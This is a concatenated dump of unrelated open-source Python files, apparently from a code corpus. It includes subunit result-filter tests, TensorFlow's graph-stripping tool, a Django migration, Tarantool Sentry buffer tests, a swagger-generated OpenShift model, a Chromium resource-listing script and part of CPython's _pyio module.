[failure[0].id() for failure in filtered_result.expectedFailures])
self.assertEqual([], filtered_result.failures)
self.assertEqual(4, filtered_result.testsRun)
def test_fixup_expected_errors(self):
filtered_result = unittest.TestResult()
result_filter = TestResultFilter(filtered_result,
fixup_expected_failures=set(["error"]))
self.run_tests(result_filter)
self.assertEqual(['error', 'todo'],
[failure[0].id() for failure in filtered_result.expectedFailures])
self.assertEqual([], filtered_result.errors)
self.assertEqual(4, filtered_result.testsRun)
def test_fixup_unexpected_success(self):
filtered_result = unittest.TestResult()
result_filter = TestResultFilter(filtered_result, filter_success=False,
fixup_expected_failures=set(["passed"]))
self.run_tests(result_filter)
self.assertEqual(['passed'],
[passed.id() for passed in filtered_result.unexpectedSuccesses])
self.assertEqual(5, filtered_result.testsRun)
def test_exclude_failure(self):
filtered_result = unittest.TestResult()
result_filter = TestResultFilter(filtered_result, filter_failure=True)
self.run_tests(result_filter)
self.assertEqual(['error'],
[error[0].id() for error in filtered_result.errors])
self.assertEqual([],
[failure[0].id() for failure in
filtered_result.failures])
self.assertEqual(3, filtered_result.testsRun)
def test_exclude_skips(self):
filtered_result = subunit.TestResultStats(None)
result_filter = TestResultFilter(filtered_result, filter_skip=True)
self.run_tests(result_filter)
self.assertEqual(0, filtered_result.skipped_tests)
self.assertEqual(2, filtered_result.failed_tests)
self.assertEqual(3, filtered_result.testsRun)
def test_include_success(self):
"""Successes can be included if requested."""
filtered_result = unittest.TestResult()
result_filter = TestResultFilter(filtered_result,
filter_success=False)
self.run_tests(result_filter)
self.assertEqual(['error'],
[error[0].id() for error in filtered_result.errors])
self.assertEqual(['failed'],
[failure[0].id() for failure in
filtered_result.failures])
self.assertEqual(5, filtered_result.testsRun)
def test_filter_predicate(self):
"""You can filter by predicate callbacks"""
filtered_result = unittest.TestResult()
def filter_cb(test, outcome, err, details):
return outcome == 'success'
result_filter = TestResultFilter(filtered_result,
filter_predicate=filter_cb,
filter_success=False)
self.run_tests(result_filter)
# Only success should pass
self.assertEqual(1, filtered_result.testsRun)
def test_time_ordering_preserved(self):
# Passing a subunit stream through TestResultFilter preserves the
# relative ordering of 'time' directives and any other subunit
# directives that are still included.
date_a = datetime(year=2000, month=1, day=1, tzinfo=iso8601.UTC)
date_b = datetime(year=2000, month=1, day=2, tzinfo=iso8601.UTC)
date_c = datetime(year=2000, month=1, day=3, tzinfo=iso8601.UTC)
subunit_stream = _b('\n'.join([
"time: %s",
"test: foo",
"time: %s",
"error: foo",
"time: %s",
""]) % (date_a, date_b, date_c))
result = ExtendedTestResult()
result_filter = TestResultFilter(result)
self.run_tests(result_filter, subunit_stream)
foo = subunit.RemotedTestCase('foo')
self.assertEquals(
[('time', date_a),
('startTest', foo),
('time', date_b),
('addError', foo, {}),
('stopTest', foo),
('time', date_c)], result._events)
def test_skip_preserved(self):
subunit_stream = _b('\n'.join([
"test: foo",
"skip: foo",
""]))
result = ExtendedTestResult()
result_filter = TestResultFilter(result)
self.run_tests(result_filter, subunit_stream)
foo = subunit.RemotedTestCase('foo')
self.assertEquals(
[('startTest', foo),
('addSkip', foo, {}),
('stopTest', foo), ], result._events)
def test_suite():
loader = subunit.tests.TestUtil.TestLoader()
result = loader.loadTestsFromName(__name__)
return result
|
tornadozou/tensorflow
|
refs/heads/master
|
tensorflow/python/tools/strip_unused.py
|
180
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Removes unneeded nodes from a GraphDef file.
This script is designed to help streamline models, by taking the input and
output nodes that will be used by an application and figuring out the smallest
set of operations that are required to run for those arguments. The resulting
minimal graph is then saved out.
The advantages of running this script are:
- You may be able to shrink the file size.
- Operations that are unsupported on your platform but still present can be
safely removed.
The resulting graph may not be as flexible as the original though, since any
input nodes that weren't explicitly mentioned may not be accessible any more.
An example of command-line usage is:
bazel build tensorflow/python/tools:strip_unused && \
bazel-bin/tensorflow/python/tools/strip_unused \
--input_graph=some_graph_def.pb \
--output_graph=/tmp/stripped_graph.pb \
--input_node_names=input0
--output_node_names=softmax
You can also look at strip_unused_test.py for an example of how to use it.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import sys
from tensorflow.python.framework import dtypes
from tensorflow.python.platform import app
from tensorflow.python.tools import strip_unused_lib
FLAGS = None
def main(unused_args):
strip_unused_lib.strip_unused_from_files(FLAGS.input_graph,
FLAGS.input_binary,
FLAGS.output_graph,
FLAGS.output_binary,
FLAGS.input_node_names,
FLAGS.output_node_names,
FLAGS.placeholder_type_enum)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.register('type', 'bool', lambda v: v.lower() == 'true')
parser.add_argument(
'--input_graph',
type=str,
default='',
help='TensorFlow \'GraphDef\' file to load.')
parser.add_argument(
'--input_binary',
nargs='?',
const=True,
type='bool',
default=False,
help='Whether the input files are in binary format.')
parser.add_argument(
'--output_graph',
type=str,
default='',
help='Output \'GraphDef\' file name.')
parser.add_argument(
'--output_binary',
nargs='?',
const=True,
type='bool',
default=True,
help='Whether to write a binary format graph.')
parser.add_argument(
'--input_node_names',
type=str,
default='',
help='The name of the input nodes, comma separated.')
parser.add_argument(
'--output_node_names',
type=str,
default='',
help='The name of the output nodes, comma separated.')
parser.add_argument(
'--placeholder_type_enum',
type=int,
default=dtypes.float32.as_datatype_enum,
help='The AttrValue enum to use for placeholders.')
FLAGS, unparsed = parser.parse_known_args()
app.run(main=main, argv=[sys.argv[0]] + unparsed)
|
Milstein/crowdsource-platform
|
refs/heads/develop2
|
crowdsourcing/migrations/0017_auto_20150709_0204.py
|
16
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('crowdsourcing', '0016_auto_20150709_0201'),
]
operations = [
migrations.AddField(
model_name='conversation',
name='recipients',
field=models.ManyToManyField(to=settings.AUTH_USER_MODEL, through='crowdsourcing.ConversationRecipient'),
),
migrations.AlterField(
model_name='conversation',
name='sender',
field=models.ForeignKey(related_name='sender', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='conversationrecipient',
name='message',
field=models.ForeignKey(related_name='conversation_message', to='crowdsourcing.Conversation'),
),
migrations.AlterField(
model_name='conversationrecipient',
name='recipient',
field=models.ForeignKey(related_name='recipients', to=settings.AUTH_USER_MODEL),
),
]
|
toidi/tarantool-python-utils
|
refs/heads/master
|
tests/test_sentry_buffer.py
|
1
|
# -*- coding: utf-8 -*-
from datetime import timedelta
import os
import mock
from unittest import TestCase
from django.conf import settings
from django.utils import timezone
from sentry.models import Project, Group
from sentry.utils.imports import import_string
from sentry.utils.compat import pickle
import tarantool
class TarantoolSentryBuffetTestCase(TestCase):
def __init__(self, *args, **kwargs):
super(TarantoolSentryBuffetTestCase, self).__init__(*args, **kwargs)
sentry_space = int(os.environ.get('SENTRY_BUFFER_SPACE', '2'))
sentry_extra_space = int(os.environ.get('SENTRY_BUFFER_EXTRA_SPACE',
'3'))
self.sentry_space = sentry_space
self.sentry_extra_space = sentry_extra_space
def setUp(self):
host_cfg = settings.SENTRY_BUFFER_OPTIONS['hosts'][0]['host']
host, _, port = host_cfg.rpartition(':')
self.client = tarantool.connect(host, int(port))
self.buffer = self.get_instance(
'tarantool_utils.sentry.Tarantool15Buffer',
settings.SENTRY_BUFFER_OPTIONS)
self.clean_tnt()
def clean_tnt(self):
lua_code = 'box.space[%s]:truncate()'
self.buffer._tnt.call('box.dostring', lua_code % self.sentry_space)
self.buffer._tnt.call('box.dostring', lua_code % self.sentry_extra_space)
def tearDown(self):
self.client.close()
def test_coerce_val_handles_foreignkeys(self):
assert self.buffer._coerce_val(Project(id=1)) == '1'
def test_coerce_val_handles_unicode(self):
assert self.buffer._coerce_val(u'\u201d') == '”'
def test_make_key_response(self):
column = 'times_seen'
filters = {'pk': 1}
self.assertEquals(self.buffer._make_key(Group, filters, column), 'sentry.group:88b48b31b5f100719c64316596b10b0f:times_seen')
def test_make_extra_key_response(self):
filters = {'pk': 1}
self.assertEquals(self.buffer._make_extra_key(Group, filters), 'sentry.group:extra:88b48b31b5f100719c64316596b10b0f')
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_extra_key', mock.Mock(return_value='extra'))
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_key', mock.Mock(return_value='foo'))
@mock.patch('sentry.buffer.base.process_incr')
def test_incr_delays_task(self, process_incr):
model = mock.Mock()
columns = {'times_seen': 1}
filters = {'pk': 1}
self.buffer.incr(model, columns, filters)
kwargs = dict(model=model, columns=columns, filters=filters, extra=None)
process_incr.apply_async.assert_called_once_with(
kwargs=kwargs, countdown=5)
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_extra_key', mock.Mock(return_value='extra'))
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_key', mock.Mock(return_value='foo'))
@mock.patch('sentry.buffer.base.process_incr', mock.Mock())
def test_incr_does_buffer_to_conn(self):
model = mock.Mock()
columns = {'times_seen': 1}
filters = {'pk': 1}
self.buffer.incr(model, columns, filters)
response = self.buffer._tnt.select(self.sentry_space, 'foo')
self.assertEquals(int(response[0][1]), 1)
self.buffer.incr(model, columns, filters)
response = self.buffer._tnt.select(self.sentry_space, 'foo')
self.assertEquals(int(response[0][1]), 2)
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_extra_key', mock.Mock(return_value='extra'))
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_key', mock.Mock(return_value='foo'))
@mock.patch('sentry.buffer.base.Buffer.process')
def test_process_does_not_save_empty_results(self, process):
group = Group(project=Project(id=1))
columns = {'times_seen': 1}
filters = {'pk': group.pk}
self.buffer.process(Group, columns, filters)
self.assertFalse(process.called)
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_extra_key', mock.Mock(return_value='extra'))
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_key', mock.Mock(return_value='foo'))
@mock.patch('sentry.buffer.base.Buffer.process')
def test_process_does_save_call_with_results(self, process):
group = Group(project=Project(id=1))
columns = {'times_seen': 1}
filters = {'pk': group.pk}
self.buffer._tnt.insert(self.sentry_space, ('foo', 2, 0L))
self.buffer.process(Group, columns, filters)
process.assert_called_once_with(Group, {'times_seen': 2}, filters, None)
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_extra_key', mock.Mock(return_value='extra'))
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_key', mock.Mock(return_value='foo'))
@mock.patch('sentry.buffer.base.Buffer.process')
def test_process_does_clear_buffer(self, process):
group = Group(project=Project(id=1))
columns = {'times_seen': 1}
filters = {'pk': group.pk}
self.buffer._tnt.insert(self.sentry_space, ('foo', 2, 0L))
self.buffer.process(Group, columns, filters)
response = self.buffer._tnt.select(self.sentry_space, ['foo'])
self.assertEquals(int(response[0][1]), 0)
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_extra_key', mock.Mock(return_value='extra'))
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_key', mock.Mock(return_value='foo'))
@mock.patch('sentry.buffer.base.process_incr', mock.Mock())
def test_incr_does_buffer_extra_to_conn(self):
model = mock.Mock()
columns = {'times_seen': 1}
filters = {'pk': 1}
self.buffer.incr(model, columns, filters, extra={'foo': 'bar'})
response = self.buffer._tnt.select(self.sentry_extra_space, [('extra', 'foo')])
self.assertEquals(response[0][2], pickle.dumps('bar'))
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_key', mock.Mock(return_value='foo'))
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_extra_key', mock.Mock(return_value='extra'))
@mock.patch('sentry.buffer.base.Buffer.process')
def test_process_saves_extra(self, process):
group = Group(project=Project(id=1))
columns = {'times_seen': 1}
filters = {'pk': group.pk}
the_date = (timezone.now() + timedelta(days=5)).replace(microsecond=0)
self.buffer._tnt.insert(self.sentry_space, ('foo', 1, 0L))
self.buffer._tnt.insert(self.sentry_extra_space, ('extra', 'last_seen', pickle.dumps(the_date), 0L))
self.buffer.process(Group, columns, filters)
process.assert_called_once_with(Group, columns, filters, {'last_seen': the_date})
lua_code = 'return box.space[%s]:len()' % (self.sentry_extra_space,)
response = self.buffer._tnt.call('box.dostring', lua_code)
self.assertEqual(0, int(response[0][0]))
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_extra_key', mock.Mock(return_value='extra'))
@mock.patch('tarantool_utils.sentry.TarantoolBuffer._make_key', mock.Mock(return_value='foo'))
@mock.patch('sentry.buffer.base.Buffer.process')
def test_process_lock_key(self, process):
group = Group(project=Project(id=1))
columns = {'times_seen': 1}
filters = {'pk': group.pk}
self.buffer._tnt.insert(self.sentry_space, ('foo', 2, 0L))
self.buffer.process(Group, columns, filters)
self.buffer.process(Group, columns, filters)
self.buffer.process(Group, columns, filters)
process.assert_called_once_with(Group, {'times_seen': 2}, filters, None)
@staticmethod
def get_instance(path, options):
cls = import_string(path)
return cls(**options)
|
ftl-toolbox/lib_openshift
|
refs/heads/master
|
lib_openshift/models/v1_deployment_config_rollback_spec.py
|
2
|
# coding: utf-8
"""
OpenAPI spec version:
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pprint import pformat
from six import iteritems
import re
class V1DeploymentConfigRollbackSpec(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
operations = [
]
# The key is attribute name
# and the value is attribute type.
swagger_types = {
'_from': 'V1ObjectReference',
'include_triggers': 'bool',
'include_template': 'bool',
'include_replication_meta': 'bool',
'include_strategy': 'bool'
}
# The key is attribute name
# and the value is json key in definition.
attribute_map = {
'_from': 'from',
'include_triggers': 'includeTriggers',
'include_template': 'includeTemplate',
'include_replication_meta': 'includeReplicationMeta',
'include_strategy': 'includeStrategy'
}
def __init__(self, _from=None, include_triggers=None, include_template=None, include_replication_meta=None, include_strategy=None):
"""
V1DeploymentConfigRollbackSpec - a model defined in Swagger
"""
self.__from = _from
self._include_triggers = include_triggers
self._include_template = include_template
self._include_replication_meta = include_replication_meta
self._include_strategy = include_strategy
@property
def _from(self):
"""
Gets the _from of this V1DeploymentConfigRollbackSpec.
From points to a ReplicationController which is a deployment.
:return: The _from of this V1DeploymentConfigRollbackSpec.
:rtype: V1ObjectReference
"""
return self.__from
@_from.setter
def _from(self, _from):
"""
Sets the _from of this V1DeploymentConfigRollbackSpec.
From points to a ReplicationController which is a deployment.
:param _from: The _from of this V1DeploymentConfigRollbackSpec.
:type: V1ObjectReference
"""
self.__from = _from
@property
def include_triggers(self):
"""
Gets the include_triggers of this V1DeploymentConfigRollbackSpec.
IncludeTriggers specifies whether to include config Triggers.
:return: The include_triggers of this V1DeploymentConfigRollbackSpec.
:rtype: bool
"""
return self._include_triggers
@include_triggers.setter
def include_triggers(self, include_triggers):
"""
Sets the include_triggers of this V1DeploymentConfigRollbackSpec.
IncludeTriggers specifies whether to include config Triggers.
:param include_triggers: The include_triggers of this V1DeploymentConfigRollbackSpec.
:type: bool
"""
self._include_triggers = include_triggers
@property
def include_template(self):
"""
Gets the include_template of this V1DeploymentConfigRollbackSpec.
IncludeTemplate specifies whether to include the PodTemplateSpec.
:return: The include_template of this V1DeploymentConfigRollbackSpec.
:rtype: bool
"""
return self._include_template
@include_template.setter
def include_template(self, include_template):
"""
Sets the include_template of this V1DeploymentConfigRollbackSpec.
IncludeTemplate specifies whether to include the PodTemplateSpec.
:param include_template: The include_template of this V1DeploymentConfigRollbackSpec.
:type: bool
"""
self._include_template = include_template
@property
def include_replication_meta(self):
"""
Gets the include_replication_meta of this V1DeploymentConfigRollbackSpec.
IncludeReplicationMeta specifies whether to include the replica count and selector.
:return: The include_replication_meta of this V1DeploymentConfigRollbackSpec.
:rtype: bool
"""
return self._include_replication_meta
@include_replication_meta.setter
def include_replication_meta(self, include_replication_meta):
"""
Sets the include_replication_meta of this V1DeploymentConfigRollbackSpec.
IncludeReplicationMeta specifies whether to include the replica count and selector.
:param include_replication_meta: The include_replication_meta of this V1DeploymentConfigRollbackSpec.
:type: bool
"""
self._include_replication_meta = include_replication_meta
@property
def include_strategy(self):
"""
Gets the include_strategy of this V1DeploymentConfigRollbackSpec.
IncludeStrategy specifies whether to include the deployment Strategy.
:return: The include_strategy of this V1DeploymentConfigRollbackSpec.
:rtype: bool
"""
return self._include_strategy
@include_strategy.setter
def include_strategy(self, include_strategy):
"""
Sets the include_strategy of this V1DeploymentConfigRollbackSpec.
IncludeStrategy specifies whether to include the deployment Strategy.
:param include_strategy: The include_strategy of this V1DeploymentConfigRollbackSpec.
:type: bool
"""
self._include_strategy = include_strategy
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(V1DeploymentConfigRollbackSpec.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
TeslaProject/external_chromium_org
|
refs/heads/lp5.1
|
tools/resources/list_resources_removed_by_repack.py
|
95
|
#!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import re
import sys
usage = """%s BUILDTYPE BUILDDIR
BUILDTYPE: either chromium or chrome.
BUILDDIR: The path to the output directory. e.g. relpath/to/out/Release
Prints out (to stdout) the sorted list of resource ids that are marked as
unused during the repacking process in the given build log (via stdin).
Additionally, attempt to print out the name of the resource and the generated
header file that contains the resource.
This script is used to print the list of resources that are not used so that
developers will notice and fix their .grd files.
"""
def GetResourceIdsFromRepackMessage(in_data):
"""Returns sorted set of resource ids that are not used from in_data.
"""
unused_resources = set()
unused_pattern = re.compile(
'RePackFromDataPackStrings Removed Key: (?P<resource_id>[0-9]+)')
for line in in_data:
match = unused_pattern.match(line)
if match:
resource_id = int(match.group('resource_id'))
unused_resources.add(resource_id)
return sorted(unused_resources)
def Main():
if len(sys.argv) != 3:
sys.stderr.write(usage % sys.argv[0])
return 1
build_type = sys.argv[1]
build_dir = sys.argv[2]
if build_type not in ('chromium', 'chrome'):
sys.stderr.write(usage % sys.argv[0])
return 1
generated_output_dir = os.path.join(build_dir, 'gen')
if not os.path.exists(generated_output_dir):
sys.stderr.write('Cannot find gen dir %s' % generated_output_dir)
return 1
if build_type == 'chromium':
excluded_header = 'google_chrome_strings.h'
else:
excluded_header = 'chromium_strings.h'
data_files = []
for root, dirs, files in os.walk(generated_output_dir):
if os.path.basename(root) != 'grit':
continue
header_files = [header for header in files if header.endswith('.h')]
if excluded_header in header_files:
header_files.remove(excluded_header)
data_files.extend([os.path.join(root, header) for header in header_files])
resource_id_to_name_file_map = {}
resource_pattern = re.compile('#define (?P<resource_name>[A-Z0-9_]+).* '
'(?P<resource_id>[0-9]+)$')
for f in data_files:
data = open(f).read()
for line in data.splitlines():
match = resource_pattern.match(line)
if match:
resource_id = int(match.group('resource_id'))
resource_name = match.group('resource_name')
if resource_id in resource_id_to_name_file_map:
print 'Duplicate:', resource_id
print (resource_name, f)
print resource_id_to_name_file_map[resource_id]
raise
resource_id_to_name_file_map[resource_id] = (resource_name, f)
unused_resources = GetResourceIdsFromRepackMessage(sys.stdin)
for resource_id in unused_resources:
if resource_id not in resource_id_to_name_file_map:
print 'WARNING: Unknown resource id', resource_id
continue
(resource_name, filename) = resource_id_to_name_file_map[resource_id]
sys.stdout.write('%d: %s in %s\n' % (resource_id, resource_name, filename))
return 0
if __name__ == '__main__':
sys.exit(Main())
|
jcoady9/python-for-android
|
refs/heads/master
|
python3-alpha/python3-src/Lib/_pyio.py
|
45
|
"""
Python implementation of the io module.
"""
import os
import abc
import codecs
import warnings
# Import _thread instead of threading to reduce startup cost
try:
from _thread import allocate_lock as Lock
except ImportError:
from _dummy_thread import allocate_lock as Lock
import io
from io import (__all__, SEEK_SET, SEEK_CUR, SEEK_END)
from errno import EINTR
# open() uses st_blksize whenever we can
DEFAULT_BUFFER_SIZE = 8 * 1024 # bytes
# NOTE: Base classes defined here are registered with the "official" ABCs
# defined in io.py. We don't use real inheritance though, because we don't
# want to inherit the C implementations.
class BlockingIOError(IOError):
"""Exception raised when I/O would block on a non-blocking I/O stream."""
def __init__(self, errno, strerror, characters_written=0):
super().__init__(errno, strerror)
if not isinstance(characters_written, int):
raise TypeError("characters_written must be a integer")
self.characters_written = characters_written
def open(file, mode="r", buffering=-1, encoding=None, errors=None,
newline=None, closefd=True):
r"""Open file and return a stream. Raise IOError upon failure.
file is either a text or byte string giving the name (and the path
if the file isn't in the current working directory) of the file to
be opened or an integer file descriptor of the file to be
wrapped. (If a file descriptor is given, it is closed when the
returned I/O object is closed, unless closefd is set to False.)
mode is an optional string that specifies the mode in which the file
is opened. It defaults to 'r' which means open for reading in text
mode. Other common values are 'w' for writing (truncating the file if
it already exists), and 'a' for appending (which on some Unix systems,
means that all writes append to the end of the file regardless of the
current seek position). In text mode, if encoding is not specified the
encoding used is platform dependent. (For reading and writing raw
bytes use binary mode and leave encoding unspecified.) The available
modes are:
========= ===============================================================
Character Meaning
--------- ---------------------------------------------------------------
'r' open for reading (default)
'w' open for writing, truncating the file first
'a' open for writing, appending to the end of the file if it exists
'b' binary mode
't' text mode (default)
'+' open a disk file for updating (reading and writing)
'U' universal newline mode (for backwards compatibility; unneeded
for new code)
========= ===============================================================
The default mode is 'rt' (open for reading text). For binary random
access, the mode 'w+b' opens and truncates the file to 0 bytes, while
'r+b' opens the file without truncation.
Python distinguishes between files opened in binary and text modes,
even when the underlying operating system doesn't. Files opened in
binary mode (appending 'b' to the mode argument) return contents as
bytes objects without any decoding. In text mode (the default, or when
't' is appended to the mode argument), the contents of the file are
returned as strings, the bytes having been first decoded using a
platform-dependent encoding or using the specified encoding if given.
buffering is an optional integer used to set the buffering policy.
Pass 0 to switch buffering off (only allowed in binary mode), 1 to select
line buffering (only usable in text mode), and an integer > 1 to indicate
the size of a fixed-size chunk buffer. When no buffering argument is
given, the default buffering policy works as follows:
* Binary files are buffered in fixed-size chunks; the size of the buffer
is chosen using a heuristic trying to determine the underlying device's
"block size" and falling back on `io.DEFAULT_BUFFER_SIZE`.
On many systems, the buffer will typically be 4096 or 8192 bytes long.
* "Interactive" text files (files for which isatty() returns True)
use line buffering. Other text files use the policy described above
for binary files.
encoding is the str name of the encoding used to decode or encode the
file. This should only be used in text mode. The default encoding is
platform dependent, but any encoding supported by Python can be
passed. See the codecs module for the list of supported encodings.
errors is an optional string that specifies how encoding errors are to
be handled---this argument should not be used in binary mode. Pass
'strict' to raise a ValueError exception if there is an encoding error
(the default of None has the same effect), or pass 'ignore' to ignore
errors. (Note that ignoring encoding errors can lead to data loss.)
See the documentation for codecs.register for a list of the permitted
encoding error strings.
newline is a string controlling how universal newlines works (it only
applies to text mode). It can be None, '', '\n', '\r', and '\r\n'. It works
as follows:
* On input, if newline is None, universal newlines mode is
enabled. Lines in the input can end in '\n', '\r', or '\r\n', and
these are translated into '\n' before being returned to the
caller. If it is '', universal newline mode is enabled, but line
endings are returned to the caller untranslated. If it has any of
the other legal values, input lines are only terminated by the given
string, and the line ending is returned to the caller untranslated.
* On output, if newline is None, any '\n' characters written are
translated to the system default line separator, os.linesep. If
newline is '', no translation takes place. If newline is any of the
other legal values, any '\n' characters written are translated to
the given string.
closedfd is a bool. If closefd is False, the underlying file descriptor will
be kept open when the file is closed. This does not work when a file name is
given and must be True in that case.
open() returns a file object whose type depends on the mode, and
through which the standard file operations such as reading and writing
are performed. When open() is used to open a file in a text mode ('w',
'r', 'wt', 'rt', etc.), it returns a TextIOWrapper. When used to open
a file in a binary mode, the returned class varies: in read binary
mode, it returns a BufferedReader; in write binary and append binary
modes, it returns a BufferedWriter, and in read/write mode, it returns
a BufferedRandom.
It is also possible to use a string or bytearray as a file for both
reading and writing. For strings StringIO can be used like a file
opened in a text mode, and for bytes a BytesIO can be used like a file
opened in a binary mode.
"""
if not isinstance(file, (str, bytes, int)):
raise TypeError("invalid file: %r" % file)
if not isinstance(mode, str):
raise TypeError("invalid mode: %r" % mode)
if not isinstance(buffering, int):
raise TypeError("invalid buffering: %r" % buffering)
if encoding is not None and not isinstance(encoding, str):
raise TypeError("invalid encoding: %r" % encoding)
if errors is not None and not isinstance(errors, str):
raise TypeError("invalid errors: %r" % errors)
modes = set(mode)
if modes - set("arwb+tU") or len(mode) > len(modes):
raise ValueError("invalid mode: %r" % mode)
reading = "r" in modes
writing = "w" in modes
appending = "a" in modes
updating = "+" in modes
text = "t" in modes
binary = "b" in modes
if "U" in modes:
if writing or appending:
raise ValueError("can't use U and writing mode at once")
reading = True
if text and binary:
raise ValueError("can't have text and binary mode at once")
if reading + writing + appending > 1:
raise ValueError("can't have read/write/append mode at once")
if not (reading or writing or appending):
raise ValueError("must have exactly one of read/write/append mode")
if binary and encoding is not None:
raise ValueError("binary mode doesn't take an encoding argument")
if binary and errors is not None:
raise ValueError("binary mode doesn't take an errors argument")
if binary and newline is not None:
raise ValueError("binary mode doesn't take a newline argument")
raw = FileIO(file,
(reading and "r" or "") +
(writing and "w" or "") +
(appending and "a" or "") +
(updating and "+" or ""),
closefd)
line_buffering = False
if buffering == 1 or buffering < 0 and raw.isatty():
buffering = -1
line_buffering = True
if buffering < 0:
buffering = DEFAULT_BUFFER_SIZE
try:
bs = os.fstat(raw.fileno()).st_blksize
except (os.error, AttributeError):
pass
else:
if bs > 1:
buffering = bs
if buffering < 0:
raise ValueError("invalid buffering size")
if buffering == 0:
if binary:
return raw
raise ValueError("can't have unbuffered text I/O")
if updating:
buffer = BufferedRandom(raw, buffering)
elif writing or appending:
buffer = BufferedWriter(raw, buffering)
elif reading:
buffer = BufferedReader(raw, buffering)
else:
raise ValueError("unknown mode: %r" % mode)
if binary:
return buffer
text = TextIOWrapper(buffer, encoding, errors, newline, line_buffering)
text.mode = mode
return text
class DocDescriptor:
"""Helper for builtins.open.__doc__
"""
def __get__(self, obj, typ):
return (
"open(file, mode='r', buffering=-1, encoding=None, "
"errors=None, newline=None, closefd=True)\n\n" +
open.__doc__)
class OpenWrapper:
"""Wrapper for builtins.open
Trick so that open won't become a bound method when stored
as a class variable (as dbm.dumb does).
See initstdio() in Python/pythonrun.c.
"""
__doc__ = DocDescriptor()
def __new__(cls, *args, **kwargs):
return open(*args, **kwargs)
# In normal operation, both `UnsupportedOperation`s should be bound to the
# same object.
try:
UnsupportedOperation = io.UnsupportedOperation
except AttributeError:
class UnsupportedOperation(ValueError, IOError):
pass
class IOBase(metaclass=abc.ABCMeta):
"""The abstract base class for all I/O classes, acting on streams of
bytes. There is no public constructor.
This class provides dummy implementations for many methods that
derived classes can override selectively; the default implementations
represent a file that cannot be read, written or seeked.
Even though IOBase does not declare read, readinto, or write because
their signatures will vary, implementations and clients should
consider those methods part of the interface. Also, implementations
may raise UnsupportedOperation when operations they do not support are
called.
The basic type used for binary data read from or written to a file is
bytes. bytearrays are accepted too, and in some cases (such as
readinto) needed. Text I/O classes work with str data.
Note that calling any method (even inquiries) on a closed stream is
undefined. Implementations may raise IOError in this case.
IOBase (and its subclasses) support the iterator protocol, meaning
that an IOBase object can be iterated over yielding the lines in a
stream.
IOBase also supports the :keyword:`with` statement. In this example,
fp is closed after the suite of the with statement is complete:
with open('spam.txt', 'r') as fp:
fp.write('Spam and eggs!')
"""
### Internal ###
def _unsupported(self, name):
"""Internal: raise an IOError exception for unsupported operations."""
raise UnsupportedOperation("%s.%s() not supported" %
(self.__class__.__name__, name))
### Positioning ###
def seek(self, pos, whence=0):
"""Change stream position.
Change the stream position to byte offset offset. offset is
interpreted relative to the position indicated by whence. Values
for whence are ints:
* 0 -- start of stream (the default); offset should be zero or positive
* 1 -- current stream position; offset may be negative
* 2 -- end of stream; offset is usually negative
Return an int indicating the new absolute position.
"""
self._unsupported("seek")
def tell(self):
"""Return an int indicating the current stream position."""
return self.seek(0, 1)
def truncate(self, pos=None):
"""Truncate file to size bytes.
Size defaults to the current IO position as reported by tell(). Return
the new size.
"""
self._unsupported("truncate")
### Flush and close ###
def flush(self):
"""Flush write buffers, if applicable.
This is not implemented for read-only and non-blocking streams.
"""
self._checkClosed()
# XXX Should this return the number of bytes written???
__closed = False
def close(self):
"""Flush and close the IO object.
This method has no effect if the file is already closed.
"""
if not self.__closed:
self.flush()
self.__closed = True
def __del__(self):
"""Destructor. Calls close()."""
# The try/except block is in case this is called at program
# exit time, when it's possible that globals have already been
# deleted, and then the close() call might fail. Since
